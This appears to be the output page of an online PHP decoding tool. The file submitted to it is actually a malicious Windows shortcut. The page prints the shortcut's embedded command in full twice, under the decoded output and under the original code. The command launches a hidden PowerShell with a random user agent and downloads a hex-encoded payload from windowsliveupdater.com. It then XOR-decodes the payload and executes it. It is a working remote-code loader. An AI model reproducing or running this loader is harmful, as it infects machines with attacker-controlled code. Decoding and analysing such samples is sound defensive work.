Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

LF@FC5PO :i+00/C:\V1Windows@ .WindowsZ1system32B .system32V2cmd.exe@ .cmd.exeTrick ..

Decoded Output download

<?  LF@FC5PO :i+00/C:\V1Windows@     .WindowsZ1system32B   .system32V2cmd.exe@  .cmd.exeTrick or treatC:/k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden "$asvods ='';$UserAgents = @('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/15.15063','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko');$RandomUserAgent = $UserAgents | Get-Random;$WebClient = New-Object System.Net.WebClient;$WebClient.Headers.Add('User-Agent', $RandomUserAgent);$boddmei = $WebClient.DownloadString('http://windowsliveupdater.com');$vurnwos ='';for($i=0;$i -le $boddmei.Length-2;$i=$i+2){$bodms=$boddmei[$i]+$boddmei[$i+1];$decodedChar = [char]([convert]::ToInt16($bodms, 16));$xoredChar=[char]([byte]($decodedChar) -bxor 0x1d);$vurnwos = $vurnwos + $xoredChar};Invoke-Command -ScriptBlock ([Scriptblock]::Create($vurnwos));Invoke-Command -ScriptBlock ([Scriptblock]::Create($asvods));C:\Windows\System32\shell32.dll%SystemRoot%\System32\shell32.dll%SystemRoot%\System32\shell32.dll% 
                                                                wN]ND.Q      1SPSXFL8C&mm.S-1-5-21-3849600975-1564034632-632203374-1001 ?>

Did this file decode correctly?

Original Code

LF@FC5PO :i+00/C:\V1Windows@     .WindowsZ1system32B   .system32V2cmd.exe@  .cmd.exeTrick or treatC:/k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden "$asvods ='';$UserAgents = @('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/15.15063','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko');$RandomUserAgent = $UserAgents | Get-Random;$WebClient = New-Object System.Net.WebClient;$WebClient.Headers.Add('User-Agent', $RandomUserAgent);$boddmei = $WebClient.DownloadString('http://windowsliveupdater.com');$vurnwos ='';for($i=0;$i -le $boddmei.Length-2;$i=$i+2){$bodms=$boddmei[$i]+$boddmei[$i+1];$decodedChar = [char]([convert]::ToInt16($bodms, 16));$xoredChar=[char]([byte]($decodedChar) -bxor 0x1d);$vurnwos = $vurnwos + $xoredChar};Invoke-Command -ScriptBlock ([Scriptblock]::Create($vurnwos));Invoke-Command -ScriptBlock ([Scriptblock]::Create($asvods));C:\Windows\System32\shell32.dll%SystemRoot%\System32\shell32.dll%SystemRoot%\System32\shell32.dll%
                                                                wN]ND.Q      1SPSXFL8C&mm.S-1-5-21-3849600975-1564034632-632203374-1001

Function Calls

None

Variables

None

Stats

MD5	49b4a1b5eb54b55a29ed1a01acfff538
Eval Count	0
Decode Time	44 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats